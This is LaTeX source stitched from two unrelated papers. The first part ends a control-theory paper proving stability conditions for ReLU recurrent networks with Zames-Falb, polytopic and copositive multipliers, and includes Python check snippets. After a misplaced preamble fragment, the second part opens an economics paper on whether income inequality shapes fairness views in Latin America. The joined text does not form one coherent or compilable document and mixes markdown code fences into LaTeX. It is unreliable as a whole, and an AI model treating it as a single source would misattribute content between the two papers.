\renewcommand{\arraystretch}{0.90}
\left\|
\left[
\begin{array}{c}
z_\tau\\
w_\tau
\end{array}\right]
\right\|_2\le
\sqrt{\frac{\nu^2}{\varepsilon^2}+2} \left\|
\left[
\begin{array}{c}
s_\tau\\
v_\tau
\end{array}\right]
\right\|_2
\end{array}
\]
holds for any $v\in l_{2e}$, $s\in l_{2e}$ and $\tau\in[0,\infty)$.
This completes the proof.
\end{proofof}
\begin{remark}
Since $G_0$ defined in \rec{eq:G0}
forms a feedback loop with $\Phi$,
and since $\|\Phi\|_2=1$,
the small gain condition $\|G_0\|_2<1$ is clearly a
sufficient condition for the stability of the RNN with the ReLU.
In addition, it is not hard to see that the ReLU $\Phi$ satisfies
$\Phi(\xi)=(D^{-1}\Phi D)(\xi)$ for any
$D\in\bbD_{++}^{m}$.
Therefore the scaled small gain condition
$\|D^{-1}G_0D\|_{2}< 1$ with $D\in\bbD_{++}^{m}$
is also a sufficient condition for the stability.
It should be noted that \rec{eq:RNNIQC} with $\Pi=0$
corresponds to the scaled small gain condition,
and that \rec{eq:RNNIQC} with $\Pi=0$ and $S=I_m$
corresponds to the small gain condition \cite{Khalil_2002}.
In this sense, the IQC-based stability condition in
\rth{th:IQC} encompasses these basic stability conditions.
\end{remark}
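The scaling invariance used in the remark above, $\Phi(\xi)=(D^{-1}\Phi D)(\xi)$ for diagonal $D\succ 0$, is simply the positive homogeneity of the componentwise ReLU. A minimal numerical sketch of this property (the dimension and values are arbitrary):

```python
import numpy as np

rng = np.random.default_rng(0)

def relu(x):
    return np.maximum(x, 0.0)

n = 5
D = np.diag(rng.uniform(0.1, 10.0, size=n))  # diagonal D > 0
for _ in range(100):
    xi = rng.normal(size=n)
    # positive homogeneity of the ReLU: relu(D xi) = D relu(xi),
    # hence (D^{-1} Phi D)(xi) = Phi(xi)
    assert np.allclose(np.linalg.solve(D, relu(D @ xi)), relu(xi))
```

This is the property that makes the diagonal scaling $D$ a free parameter in the scaled small gain condition.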
\section{Concrete Multipliers Capturing the Properties of ReLU}
\subsection{Zames-Falb Multiplier}
In this section, we summarize the arguments of
\cite{Fetzler_IFAC2017} on the discrete-time
Zames-Falb multipliers \cite{Zames_SIAM1968}.
By following \cite{Fetzler_IFAC2017}, we first introduce the following definitions.
\begin{definition}\cite{Fetzler_IFAC2017}
Let $\mu\le 0 \le \nu$.
Then the nonlinearity $\phi:\ \bbR\to\bbR$ is slope-restricted,
in short $\phi \in \slope(\mu,\nu)$, if $\phi(0)=0$ and
\[
\mu\leq \dfrac{\phi(x)-\phi(y)}{x-y}
\le
\sup_{x\neq y}\dfrac{\phi(x)-\phi(y)}{x-y}
<\nu
\]
for all $x,y\in\bbR$, $x\neq y$.
On the other hand, the nonlinearity $\phi$ is said to be sector-bounded if
\[
(\phi(x)-\alpha x)(\phi(x)-\beta x)\leq 0
\ (\forall x\in\bbR)
\]
for some $\alpha \le 0 \le \beta$.
This is expressed as $\phi\in\sec[\alpha,\beta]$.
\end{definition}
The main result of \cite{Fetzler_IFAC2017}
on the discrete-time Zames-Falb multipliers
for slope-restricted nonlinearities can be
summarized by the next lemma.
\begin{lemma}\cite{Fetzler_IFAC2017}
For a given nonlinearity $\phi\in \slope(\mu,\nu)$ with
$\mu\le 0\le \nu$,
let us define $\Phi:\ \bbR^m\to \bbR^m$
by the first equation in \rec{eq:ReLU}.
Assume $M\in\DHD^m$. Then we have
\[
\scalebox{0.93}{$
\begin{array}{@{}l}
(\ast)^T
\left[
\begin{array}{cc}
0 & M^T\\
M & 0
\end{array}
\right]
\left(
\left[
\begin{array}{cc}
\nu I_m & -I_m\\
-\mu I_m & I_m\\
\end{array}
\right]
\left[
\begin{array}{c}
x\\
\Phi(x)
\end{array}
\right]\right)\ge 0\ \forall x \in\bbR^m.
\end{array}$}
\]
\label{le:sl}
\end{lemma}
From this key lemma and the fact that the ReLU $\phi:\ \bbR\to\bbR$
satisfies $\phi\in\slope(0,1)$,
we can obtain the next result on
the Zames-Falb multiplier for the ReLU given by \rec{eq:ReLU}.
\begin{corollary}
Let us define
\begin{equation}
\scalebox{0.75}{$
\begin{array}{@{}l}
\arraycolsep=0.5mm
\PiZF:=
\left\{
\Pi\in\bbS^{2m}:\
\Pi=
(\ast)^T
\left[
\begin{array}{cc}
0 & M^T\\
M & 0
\end{array}
\right]
\left[
\begin{array}{cc}
I_m & -I_m\\
0 & I_m\\
\end{array}
\right],\ M\in \DHD^m \right\}.
\end{array}$}
\label{eq:MZF}
\end{equation}
Then, $\Pi\in \PiZF$ is a valid multiplier that satisfies \rec{eq:IQC0}
for the ReLU $\Phi$ given by \rec{eq:ReLU}.
\label{cor:ZF}
\end{corollary}
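As a sanity check, the inequality underlying \rco{cor:ZF} can be verified numerically: for any $M\in\DHD^m$ (which we read here as doubly hyperdominant, i.e., nonpositive off-diagonal entries with nonnegative row and column sums), the quadratic form of the resulting $\Pi$ is nonnegative along the graph of the ReLU. A sketch with a randomly generated $M$:

```python
import numpy as np

rng = np.random.default_rng(1)
m = 4

def relu(x):
    return np.maximum(x, 0.0)

# A doubly hyperdominant M: nonpositive off-diagonal entries and
# nonnegative row and column sums (a randomly generated instance).
M = -rng.uniform(0.0, 1.0, size=(m, m))
np.fill_diagonal(M, 0.0)
d = np.maximum(-M.sum(axis=0), -M.sum(axis=1)) + rng.uniform(0.0, 1.0, size=m)
M = M + np.diag(d)
assert (M.sum(axis=0) >= 0).all() and (M.sum(axis=1) >= 0).all()

# Pi = (*)^T [[0, M^T], [M, 0]] [[I, -I], [0, I]] as in eq. (MZF)
I = np.eye(m)
Z = np.zeros((m, m))
A = np.block([[I, -I], [Z, I]])
Pi = A.T @ np.block([[Z, M.T], [M, Z]]) @ A

# The quadratic form is nonnegative along the graph of the ReLU:
# [x; relu(x)]^T Pi [x; relu(x)] = 2 relu(x)^T M (x - relu(x)) >= 0,
# since relu(x) >= 0, x - relu(x) <= 0, and the two vectors have
# disjoint supports.
for _ in range(1000):
    x = rng.normal(size=m)
    v = np.concatenate([x, relu(x)])
    assert v @ Pi @ v >= -1e-9
```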
\subsection{Polytopic Bounding Multiplier}
The polytopic bounding multipliers are useful
to capture the properties of sector-bounded nonlinearities.
To represent them in a compact fashion, let us define
\begin{equation}
\scalebox{0.85}{$
\begin{array}{@{}l}
\arraycolsep=0.1mm
\Pispol[\alpha,\beta]:=
\left\{
\Pi \in \bbS^{2m}:\
(\ast)^T \Pi
\left[
\begin{array}{c}
I \\
\Delta
\end{array}
\right]\succ 0\ \forall \Delta \in \bbD^m[\alpha,\beta]
\right\}.
\end{array}$}
\label{eq:Pipol0}
\end{equation}
Then the following lemma provides
the polytopic bounding multipliers for sector-bounded nonlinearities.
\begin{lemma}\cite{Fetzler_IFAC2017}
For a given nonlinearity $\phi\in \sec[\alpha,\beta]$ with
$\alpha\le 0\le \beta$,
let us define $\Phi:\ \bbR^m\to \bbR^m$
by the first equation in \rec{eq:ReLU}.
Assume $\Pi\in\Pispol[\alpha,\beta]$.
Then we have
\[
(\ast)^T
\Pi
\left[
\begin{array}{c}
x\\
\Phi(x)
\end{array}
\right]\ge 0\ \forall x \in\bbR^m.
\]
\label{le:sb}
\end{lemma}
As also stated in \cite{Fetzler_IFAC2017},
it is hard to check whether $\Pi\in\Pispol[\alpha,\beta]$ holds
since $\Pispol[\alpha,\beta]$ is characterized by infinitely many constraints.
To get around this difficulty, we employ a primitive but numerically tractable
inner approximation of $\Pispol[\alpha,\beta]$ given as follows:
\begin{equation}
\scalebox{0.9}{$
\begin{array}{@{}l}
\arraycolsep=0.3mm
\Pipol[\alpha,\beta]:=
\left\{
\Pi =
\left[
\begin{array}{cc}
X & Y \\
Y^T & Z
\end{array}
\right]
\in \bbS^{2m}:\right.\\ \left.
\arraycolsep=0.3mm
(\ast)^T \Pi
\left[
\begin{array}{c}
I \\
\Delta
\end{array}
\right]\succ 0\ \forall \Delta \in \bbD_\mathrm{ver}^m[\alpha,\beta],\
Z_{ii}\le 0\ (i=1,\cdots,m)
\right\}. \hspace*{-20mm}
\end{array}$}
\label{eq:Pipol}
\end{equation}
From this inner approximation and the fact that
the ReLU $\phi:\ \bbR\to\bbR$
satisfies $\phi\in\sec[0,1]$,
we can obtain the next result that provides
the polytopic bounding multiplier for the ReLU given by \rec{eq:ReLU}.
\begin{corollary}
Let us define
\begin{equation}
\scalebox{0.9}{$
\begin{array}{@{}l}
\arraycolsep=0.5mm
\Pipol:=
\left\{
\Pi =
\left[
\begin{array}{cc}
X & Y \\
Y^T & Z
\end{array}
\right]
\in \bbS^{2m}:\right.\\ \left.
(\ast)^T \Pi
\left[
\begin{array}{c}
I \\
\Delta
\end{array}
\right]\succ 0\ \forall \Delta \in \bbD_\mathrm{ver}^m[0,1],\
Z_{ii}\le 0\ (i=1,\cdots,m)
\right\}. \hspace*{-20mm}
\end{array}$}
\label{eq:Mpol}
\end{equation}
Then, $\Pi\in \Pipol$ is a valid multiplier that satisfies \rec{eq:IQC0}
for the ReLU $\Phi$ given by \rec{eq:ReLU}.
\label{cor:pol}
\end{corollary}
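The vertex condition in \rec{eq:Mpol} involves only the $2^m$ diagonal $0/1$ matrices, so membership in $\Pipol$ can be checked by finite enumeration. The sketch below builds a simple (hypothetical) element with $X=\epsilon I$, $Y=D/2$, $Z=-D$ for diagonal $D\succ 0$, verifies the vertex LMIs, and confirms that the resulting multiplier satisfies the IQC \rec{eq:IQC0} along the ReLU graph:

```python
import itertools
import numpy as np

rng = np.random.default_rng(4)
m = 3

def relu(x):
    return np.maximum(x, 0.0)

# A hypothetical element of Pi_pol: X = eps*I, Y = D/2, Z = -D with
# diagonal D > 0, so the condition Z_ii <= 0 holds by construction.
eps = 0.1
D = np.diag(rng.uniform(0.5, 2.0, size=m))
Pi = np.block([[eps * np.eye(m), D / 2.0], [D / 2.0, -D]])

# Vertex condition: [I; Delta]^T Pi [I; Delta] > 0 for all diagonal
# Delta with entries in {0, 1} (finite enumeration over 2^m vertices).
I = np.eye(m)
for bits in itertools.product([0.0, 1.0], repeat=m):
    V = np.vstack([I, np.diag(bits)])
    assert np.linalg.eigvalsh(V.T @ Pi @ V).min() > 0.0

# The multiplier then satisfies the IQC along the ReLU graph:
# since relu(x)_i * (x - relu(x))_i = 0, the form reduces to
# eps * |x|^2 >= 0.
for _ in range(1000):
    x = rng.normal(size=m)
    v = np.concatenate([x, relu(x)])
    assert v @ Pi @ v >= -1e-9
```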
We finally note that the name ``polytopic bounding''
reflects the fact that the multipliers in
\rec{eq:Pipol0} and \rec{eq:Pipol}
have historically been used to handle parametric uncertainties in polytopes
in the context of robust control \cite{Iwasaki_IEEE1998,Scherer_Automatica2001}.
\begin{remark}
Although we restrict our attention
to the static Zames-Falb multipliers of the form \rec{eq:MZF} in \rco{cor:ZF},
dynamical finite impulse response (FIR) Zames-Falb multipliers
are also investigated in \cite{Fetzler_IFAC2017} in the frequency domain.
We do not pursue this direction in the present paper,
mainly because the novel copositive multipliers,
to be introduced in the next subsection,
rely on time-domain analysis.
We expect, however, that
an extension analogous to the FIR multipliers of
\cite{Fetzler_IFAC2017} can be achieved in the time domain
by means of discrete-time system lifting \cite{Bittanti_1996}.
Such an extension, and its relationship to the FIR multipliers,
is currently under investigation.
We have already obtained related results on the use
of discrete-time system lifting in \cite{Ebihara_EJC2021}.
\end{remark}
\begin{remark}
As clarified in \cite{Fetzler_IFAC2017},
the polytopic bounding multiplier encompasses
several existing and frequently used multipliers.
For instance,
the following so-called diagonally structured multiplier has often been employed
to handle the sector-bounded nonlinearities $\Phi$ in \rle{le:sb}:
\[
\scalebox{0.85}{$
\begin{array}{@{}l}
\bPi_\mathrm{ds}[\alpha,\beta]:=
\left\{
\Pi \in\bbS^{2m}:\ \Pi=
\left[
\begin{array}{cc}
-\alpha\beta D & \dfrac{\alpha+\beta}{2} D \\
\ast & -D
\end{array}
\right],\
D\in\bbD_{++}^m
\right\}.
\end{array}$}
\]
It is then clear that
$\bPi_\mathrm{ds}[\alpha,\beta]\subset\Pipol[\alpha,\beta]\subset\Pispol[\alpha,\beta]$.
Since the effectiveness of the Zames-Falb multipliers is also widely
recognized,
$\Pi\in \Pipol + \PiZF$ can be regarded as the most up-to-date,
effective, and numerically tractable existing (static) multiplier
for handling the ReLU.
\end{remark}
\subsection{Novel Copositive Multiplier}
It has recently been shown in \cite{Raghunathan_NIPS2018}
that the input-output relationship of the ReLU given by
\rec{eq:ReLU} can be fully captured by
three (in)equalities;
a similar observation can be found in \cite{Groff_CDC2019}.
Namely, $\zeta=\phi(\xi)$ holds
for the input $\xi\in\bbR$ and output $\zeta\in\bbR$
of the ReLU if and only if
\begin{equation}
\zeta(\zeta-\xi)=0,\ \zeta\ge 0,\ \zeta-\xi\ge 0.
\label{eq:ReLU2}
\end{equation}
The first constraint is quadratic in the input and output signals
and hence compatible with IQCs.
In fact, it can be regarded as the extreme case of
the sector-bounded nonlinearity $\phi\in\sec[0,1]$,
and from this constraint we can again conclude that
$\Pi\in \Pipol$ is a valid multiplier satisfying
\rec{eq:IQC0}.
On the other hand, the second and third constraints are
{\it linear} in the input and output signals.
They therefore do not conform to the IQC framework
as long as we rely merely on the standard positive semidefinite cone $\PSD$,
since the cone $\PSD$ cannot
distinguish nonnegative vectors
in the quadratic form.
To get around this difficulty, we employ the copositive cone
$\COP$ and introduce the copositive multipliers.
This result is summarized in the next theorem.
\begin{theorem}
Let us define
\begin{equation}
\scalebox{0.83}{$
\begin{array}{@{}l}
\arraycolsep=0.5mm
\PisCOP:=
\left\{\Pi\in \bbS^{2m}:\ \Pi=
(\ast)^T Q
\left[
\begin{array}{cc}
-I_m & I_m\\
0 & I_m\\
\end{array}
\right],\ Q\in \COP_{2m}
\right\}.
\end{array}$}
\label{eq:MCOPs}
\end{equation}
Then, $\Pi\in \PisCOP$ is a valid multiplier that satisfies \rec{eq:IQC0}
for the ReLU $\Phi$ given by \rec{eq:ReLU}.
\label{th:COP}
\end{theorem}
\begin{remark}
As stated in \rsec{sec:cop}, it is hard to check whether
$Q\in \COP_{2m}$ holds in \rec{eq:MCOPs} and hence
the copositive multiplier \rec{eq:MCOPs} is intractable in general.
To get around this difficulty, we apply inner approximation to the
copositive cone $\COP$ and define
%
\begin{equation}
\scalebox{0.72}{$
\begin{array}{@{}l}
\arraycolsep=0.5mm
\PiCOP:=
\left\{\Pi\in \bbS^{2m}:\ \Pi=
(\ast)^T Q
\left[
\begin{array}{cc}
-I_m & I_m\\
0 & I_m\\
\end{array}
\right],\ Q\in \PSD_{2m}+\NN_{2m}
\right\}.
\end{array}$}
\label{eq:MCOP}
\end{equation}
%
Then, it is clear from \rec{eq:inc1} that $\PiCOP\subset \PisCOP$
and hence $\Pi\in\PiCOP$ is a valid multiplier that satisfies \rec{eq:IQC0}
for the ReLU $\Phi$ given by \rec{eq:ReLU}.
In particular, $\PiCOP=\PisCOP$ holds if $m\le 2$.
It should be noted that checking $Q\in \PSD_{2m}+\NN_{2m}$ is
numerically tractable since this is essentially a positive semidefinite
constraint.
\end{remark}
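The tractable relaxation $Q\in\PSD_{2m}+\NN_{2m}$ guarantees copositivity by construction: writing $Q=P+N$ with $P$ positive semidefinite and $N$ entrywise nonnegative, we have $x^TQx = x^TPx + x^TNx \ge 0$ for every $x\ge 0$. A small numerical illustration (the dimension and matrices are arbitrary):

```python
import numpy as np

rng = np.random.default_rng(3)
k = 4  # stands in for the cone dimension 2m; value is arbitrary

# Q = P + N with P positive semidefinite and N entrywise nonnegative
B = rng.normal(size=(k, k))
P = B @ B.T                       # P in PSD_k
N = rng.uniform(0.0, 1.0, size=(k, k))
N = (N + N.T) / 2.0               # N in NN_k (symmetric, nonnegative)
Q = P + N

# Any such Q is copositive: for x >= 0,
# x^T Q x = x^T P x + x^T N x >= 0.
for _ in range(1000):
    x = rng.uniform(0.0, 1.0, size=k)
    assert x @ Q @ x >= -1e-12
```

The converse inclusion fails in general for $2m\ge 5$, which is why the relaxation is only an inner approximation of $\COP_{2m}$.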
\begin{remark}
In relation to the copositive multiplier \rec{eq:MCOP},
let us consider its special class given by
\[
\scalebox{0.73}{$
\begin{array}{@{}l}
\arraycolsep=0.5mm
\PiCOPz:=
\left\{\Pi\in \bbS^{2m}:\ \Pi=
(\ast)^T
\left[
\begin{array}{cc}
0 & 0 \\
0 & \hatQ
\end{array}
\right]
\left[
\begin{array}{cc}
-I_m & I_m\\
0 & I_m\\
\end{array}
\right],\ \hatQ\in \PSD_{m}+\NN_{m}
\right\}.
\end{array}$}
\]
Then, we can see from \cite{Ebihara_EJC2021} that
the condition \rec{eq:RNNIQC} with $\Pi\in \PiCOPz$
is a sufficient condition for the $l_{2+}$-induced-norm-based
scaled small gain condition $\|D^{-1}G_0D\|_{2+}< 1$ with $D\in\bbD_{++}^m$.
Since the ReLU returns only nonnegative signals,
one can intuitively expect that $\|D^{-1}G_0D\|_{2+}< 1$ is a
sufficient condition for the stability.
We validated this as the main result of \cite{Ebihara_EJC2021},
providing also the numerically verifiable condition
\rec{eq:RNNIQC} with $\Pi\in \PiCOPz$.
Since $\PiCOPz\subset \PiCOP$ holds,
we can conclude that
the present result encompasses the main result of
\cite{Ebihara_EJC2021}
as a special case.
\end{remark}
\begin{remark}
The treatment of nonnegative signals is central
to the analysis of positive systems,
and integral {\it linear} constraints were introduced in \cite{Briat_IJRN2013}
to actively exploit this nonnegativity in the analysis.
However, to build an effective stability analysis method for RNNs upon
the powerful IQC approach with existing multipliers,
we have to capture the nonnegativity of the signals in {\it quadratic} form.
This is the reason why we introduced the copositive multipliers.
\end{remark}
\section{Numerical Examples}
In \rec{eq:RNN}, let us consider the case
$\Lambda=0$, $\Wout=I_6$ and
\[
\scalebox{0.9}{$
\begin{array}{@{}l}
\Win=
\left[
\begin{array}{rrrrrr}
0.29 & -0.04 & 0.02+a & -0.35 & -0.05 & -0.12\\
-0.29 & -0.24 & -0.01 & 0.12 & -0.13 & 0.18\\
-0.50 & b & 0.23 & 0.40 & -0.28 & -0.08\\
0.14 & -0.27 & -0.15 & 0.13 & -0.47 & -0.28\\
-0.10 & -0.10 & 0.08 & 0.14 & -0.22 & 0.50\\
-0.11 & -0.28 & -0.21 & -0.14 & -0.09 & 0.20\\
\end{array}
\right].
\end{array}$}
\]
For $(a,b)=(0,0)$, we see $\|G_0\|_2=0.9605$.
Here we examined the finite gain $l_2$ stability
over the (time-invariant) parameter variation
$a\in[-2,2]$ and $b\in [-10,10]$.
This example is exactly the same as that of \cite{Ebihara_EJC2021}
except for the range of the parameter variation.
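The reported value of $\|G_0\|_2$ can be reproduced directly: with $\Lambda=0$ and $\Wout=I_6$, the transfer function $G_0(z)=\Wout(zI-\Lambda)^{-1}\Win$ (our reading of \rec{eq:G0}) reduces to $\Win/z$, whose $l_2$-induced norm is the largest singular value of $\Win$:

```python
import numpy as np

# W_in for (a, b) = (0, 0), copied from the example above
Win = np.array([
    [ 0.29, -0.04,  0.02, -0.35, -0.05, -0.12],
    [-0.29, -0.24, -0.01,  0.12, -0.13,  0.18],
    [-0.50,  0.00,  0.23,  0.40, -0.28, -0.08],
    [ 0.14, -0.27, -0.15,  0.13, -0.47, -0.28],
    [-0.10, -0.10,  0.08,  0.14, -0.22,  0.50],
    [-0.11, -0.28, -0.21, -0.14, -0.09,  0.20],
])

# With Lambda = 0 and Wout = I_6, ||G0||_2 = sigma_max(Win).
gain = np.linalg.norm(Win, ord=2)
print(f"||G0||_2 = {gain:.4f}")  # the paper reports 0.9605
```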
We tested the following stability conditions: \\
\ul{Test I (SSG):}\
Find $P\in \PSD_n$, $S\in\bbD_{++}^m$ such that
\rec{eq:RNNIQC} holds with $\Pi=0$. \\
\ul{Test II ($l_{2+}$-SSG):}\
Find $P\in \PSD_n$, $S\in\bbD_{++}^m$, and
$\Pi\in \PiCOPz$ such that \rec{eq:RNNIQC} holds. \\
\ul{Test III (SSG+ZF+PolB):}\
Find $P\in \PSD_n$, $S\in\bbD_{++}^m$ and
$\Pi\in \PiZF+\Pipol$ such that \rec{eq:RNNIQC} holds. \\
\ul{Test IV (SSG+ZF+PolB+COP):}\
Find $P\in \PSD_n$, $S\in\bbD_{++}^m$ and
$\Pi\in \PiZF+\Pipol+\PiCOP$ such that \rec{eq:RNNIQC} holds.
Clearly, if Test I is feasible, then so are Tests II and III;
and if Test III is feasible, then so is Test IV.
However, there is no theoretical inclusion relationship between Tests II and
III.
Test I corresponds to the scaled small gain condition with the standard
$l_2$ induced norm,
while
Test II corresponds to the scaled small gain condition with
the $l_{2+}$ induced norm.
These have already been implemented in \cite{Ebihara_EJC2021},
but we retested them since we changed the range of the parameter variation.
In \rfig{fig:comp1},
we plot $(a,b)$ for which the RNN is proved to be stable
by Tests I and II.
Both Tests turned out to be feasible
for $(a,b)$ in the green region,
whereas only Test II turned out to be feasible
for $(a,b)$ in the magenta region.
On the other hand, in \rfig{fig:comp2},
both Tests III and IV turned out to be feasible
for $(a,b)$ in the red region,
whereas only Test IV turned out to be feasible
for $(a,b)$ in the blue region.
From both figures, we can confirm the effectiveness of the
copositive multipliers.
Comparing Tests II and III,
Test III turned out to be feasible in a much larger region than
Test II, although there is no strict inclusion relationship between them.
In fact, for $(a,b)=(1.0,1.4)$,
Tests II and III turned out to be feasible and infeasible, respectively.
\section{Conclusion and Future Works}
In this paper, we dealt with the stability analysis of the RNN with the ReLU
by means of the IQC framework.
By actively using the nonnegativity property of the ReLU,
we newly introduced the copositive multipliers.
We showed that the copositive multipliers (or their inner approximations)
can be employed together with existing multipliers such as
Zames-Falb multipliers and polytopic bounding multipliers,
which directly ensures that the introduction of
copositive multipliers leads to results that are no more conservative.
By numerical examples, we illustrated the effectiveness of the
copositive multipliers.
In the present paper and \cite{Ebihara_EJC2021},
we converted a COP to an SDP
by simply replacing $\COP$ by $\PSD+\NN$.
However, this treatment is conservative. In this respect,
Lasserre \cite{Lasserre_2014} and
de Klerk and Pasechnik \cite{De_SIAM2002}
have independently shown how to
construct a hierarchy of SDPs that solves COPs
in an asymptotically exact fashion, but
the size of these SDPs grows very rapidly,
which is prohibitive for realistic, larger-size networks.
To get around this difficulty,
we plan to rely on efficient first-order methods to
solve the specific conic relaxations arising from
polynomial optimization problems with sphere constraints
\cite{Mai_arXiv2020}.
\begin{figure}[t]
\begin{center}
\vspace*{-2mm}
\includegraphics[scale=0.50]{SGvsSG.pdf}
\vspace*{-6mm}
\caption{Comparison: Test I vs Test II. }
\label{fig:comp1}
\end{center}
\vspace*{-4mm}
\begin{center}
\includegraphics[scale=0.50]{ZFpol+COP.pdf}
\vspace*{-6mm}
\caption{Comparison: Test III vs Test IV. }
\label{fig:comp2}
\vspace*{-8mm}
\end{center}
\end{figure}
\input{final.bbl}
\end{document}
{-3.25ex\@plus -1ex \@minus -.2ex
{-1.5ex \@plus -.2ex
{\normalfont\normalsize\bfseries}}
\def\@biblabel#1{\hspace*{-\labelsep}}
\newcommand*\circled[1]{\tikz[baseline=(char.base)]{
\node[shape=circle,draw,inner sep=2pt] (char) {#1};}}
\newcommand*\ExpandableInput[1]{\@@input#1 }
\makeatother
\def\sym#1{\ifmmode^{#1}\else\(^{#1}\)\fi}
\onehalfspacing
\pdfpageheight\paperheight
\pdfpagewidth\paperwidth
\newcolumntype{L}[1]{>{\raggedright\let\newline\\\arraybackslash\hspace{0pt}}m{#1}}
\newcolumntype{C}[1]{>{\centering\let\newline\\\arraybackslash\hspace{0pt}}m{#1}}
\newcolumntype{R}[1]{>{\raggedleft\let\newline\\\arraybackslash\hspace{0pt}}m{#1}}
\begin{document}
\title{Are Fairness Perceptions Shaped by Income Inequality? Evidence from Latin America\thanks{\noindent Gasparini: Centro de Estudios Distributivos, Laborales y Sociales (CEDLAS) - IIE-FCE, Universidad Nacional de La Plata and CONICET (e-mail: \text{lgasparini@cedlas.org}). Reyes: Cornell University (e-mail \text{gjr66@cornell.edu}). For helpful comments, we thank Carolina Garc\'ia Domench, Giselle Del Carmen, Rebecca Deranian, Luis Laguinge, participants of the 2021 Annual Bank Conference on Development Economics, and two anonymous referees. A previous version of this article circulated as ``Perceptions of Distributive Justice in Latin America during a Period of Falling Inequality.'' Errors and omissions are our own.}}
\author{Leonardo Gasparini \and Germ\'an Reyes}
\date{\vspace{15pt} February 2022}
\maketitle
\begin{abstract}
\noindent A common assumption in the literature is that the level of income inequality shapes individuals' beliefs about whether the income distribution is fair (``fairness views,'' for short). However, individuals do not directly observe income inequality (which often leads to large misperceptions), nor do they consider all inequities to be unfair. In this paper, we empirically assess the link between objective measures of income inequality and fairness views in a context of high but decreasing income inequality. We combine opinion poll data with harmonized data from household surveys of 18 Latin American countries from 1997--2015. We report three main findings. First, we find a strong and statistically significant relationship between income inequality and unfairness views across countries and over time. Unfairness views evolved in the same direction as income inequality for 17 out of the 18 countries in our sample. Second, individuals who are older, unemployed, and left-wing are, on average, more likely to perceive the income distribution as very unfair. Third, fairness views and income inequality have predictive power for individuals' self-reported propensity to mobilize and protest independent of each other, suggesting that these two variables capture different channels through which changes in the income distribution can affect social unrest. \\
\end{abstract}
\clearpage
\input{1-intro}
\input{2-data}
\input{3-inequality-fairness}
\input{4-correlates-fairness}
\input{5-fairness-protests}
\input{6-conclusions}
\clearpage
\input{7-figures}
\clearpage
\begin{singlespace}
\bibliographystyle{chicago}
\section{Introduction}
Several theoretical and empirical papers study how objective measures of income inequality affect individual-level behavior.\footnote{Researchers have studied how income inequality affects cooperation \citep{cozzolino2011trust}, demand for redistribution \citep{meltzer1981rational, finseraas2009income}, dishonesty \citep{neville2012economic}, social cohesion \citep{alesina1996income}, subjective wellbeing \citep{oishi2011income}, and trust \citep{gustavsson2008inequality}.} Implicit in much of this literature is the assumption that inequality shapes individuals' beliefs about whether the income distribution is fair (``fairness views,'' for short).\footnote{For example, one important reason why social cohesion might be related to income inequality is that, as inequality increases, more individuals perceive the income distribution as unfair, making them more prone to mobilize. Similarly, we would not expect inequality to be negatively linked to subjective wellbeing if increases in income disparities were perceived as fair.} However, two pieces of evidence suggest that the link between inequality and fairness views is not straightforward. First, fairness views are not informed by objective measures of inequality---since these are not directly observable by individuals---but instead by perceived inequality. Research about how accurately people perceive income inequality shows large gaps between individuals' perceptions and the actual levels of inequality \citep{norton2011building,kuziemko2015elastic, gimpelson2018misperceiving, choi2019revisiting}. Second, even absent any misperceptions, individuals do not consider all inequities to be unfair. Specifically, individuals largely accept income disparities derived from personal choices and effort, but deem inequities driven by luck or chance as unfair \citep{cappelen2007pluralism, alesina2011preferences, cappelen2013just, almaas2020cutthroat}. 
Thus, the extent to which fairness perceptions are shaped by income inequality remains an important empirical question.
In this paper, we empirically study the link between fairness views and income inequality in a particular scenario: a region of highly unequal countries---Latin America---but during a period in which inequality pronouncedly declined. First, we assess the extent to which fairness views are linked to income inequality, both across countries and over time. Then, we analyze how individual-level factors such as education, political ideology, and religious views relate to fairness views. Finally, we investigate the predictive power of fairness views for individuals' propensity to protest and mobilize.
In Section \ref{sec_context_data}, we describe the institutional context and our data. Our setting is Latin America, one of the most unequal regions in the world \citep{alvaredo2015recent}. We focus on the 2000s, an unusual period in that income inequality saw a widespread decrease across countries in the region \citep{gasparini2011recent}. To relate income inequality to fairness views, we combine data from two harmonization projects. Our source for income inequality data is SEDLAC, a project that increases cross-country comparability of household surveys. These data enable us to compare the evolution of income inequality across countries and over time. The data on fairness perceptions come from public opinion polls conducted by Latinobar\'ometro in 18 Latin American countries since the 1990s.
In Section \ref{sec_ineq_fairness}, we document a series of stylized facts about fairness views in the region. A strikingly high, albeit decreasing, share of the population believes that the income distribution in their country is unfair. In 2002, almost nine out of ten individuals perceived the income distribution as unfair (86.6\%). By 2015, this figure declined to 75.1\%. This decline is particularly striking considering that previous research highlights people's tendency to report perceptions of stable or increasing inequality, regardless of its actual evolution \citep{gimpelson2018misperceiving}.
Next, we link fairness views to income inequality. We study how the Gini coefficient---our main measure of inequality---correlates with fairness views across countries and over time. We find a strong linear correlation between the Gini coefficient and the percent of the population that perceives inequality as unfair across country-years. Fairness views evolved in the same direction as the Gini in 17 out of the 18 countries in our sample during the 2000s.
The decline in income inequality during the 2000s---although remarkable by historical standards---was not enough to substantially modify the view of Latin Americans with respect to distributive fairness in their societies. Three out of four citizens of the region still believe that the income distribution is unfair. A one percentage point decrease in the Gini is associated with a 1.4 percentage point decrease in the share of the population perceiving the income distribution as unfair. Holding constant this elasticity and the pace of inequality reduction of the 2000s, reducing the share of the population that perceives inequality as unfair to 50\% would take more than a decade.
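The back-of-the-envelope projection above follows from the reported figures (75.1\% perceiving the distribution as unfair in 2015, a target share of 50\%, and an elasticity of 1.4 percentage points of unfairness per Gini point); the arithmetic can be reproduced as:

```python
# Figures as reported in the text; the extrapolation assumes the
# estimated elasticity stays constant out of sample.
unfair_share_2015 = 75.1   # % perceiving the income distribution as unfair
target_share = 50.0
pp_unfair_per_pp_gini = 1.4

required_gini_drop = (unfair_share_2015 - target_share) / pp_unfair_per_pp_gini
print(f"Required Gini decline: {required_gini_drop:.1f} percentage points")
```

A decline of roughly 18 Gini points is far larger than what the region achieved per year during the 2000s, consistent with the more-than-a-decade horizon stated in the text.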
Next, we investigate whether inequality measures other than the Gini coefficient are stronger predictors of unfairness beliefs. This question is of interest in its own right, given the ongoing debate on whether income inequality should be measured with relative or absolute indicators \citep{ravallion2003debate, atkinson2010analyzing}. We take an agnostic approach and correlate a large number of relative and absolute measures of inequality with unfairness views. We find that relative indicators are strongly positively correlated with people's perceptions of unfairness. In contrast, absolute indicators tend to be \textit{negatively} correlated with unfairness views. This is because absolute income gaps became wider in Latin America in the booming years under analysis, yet perceptions about unfairness went down.
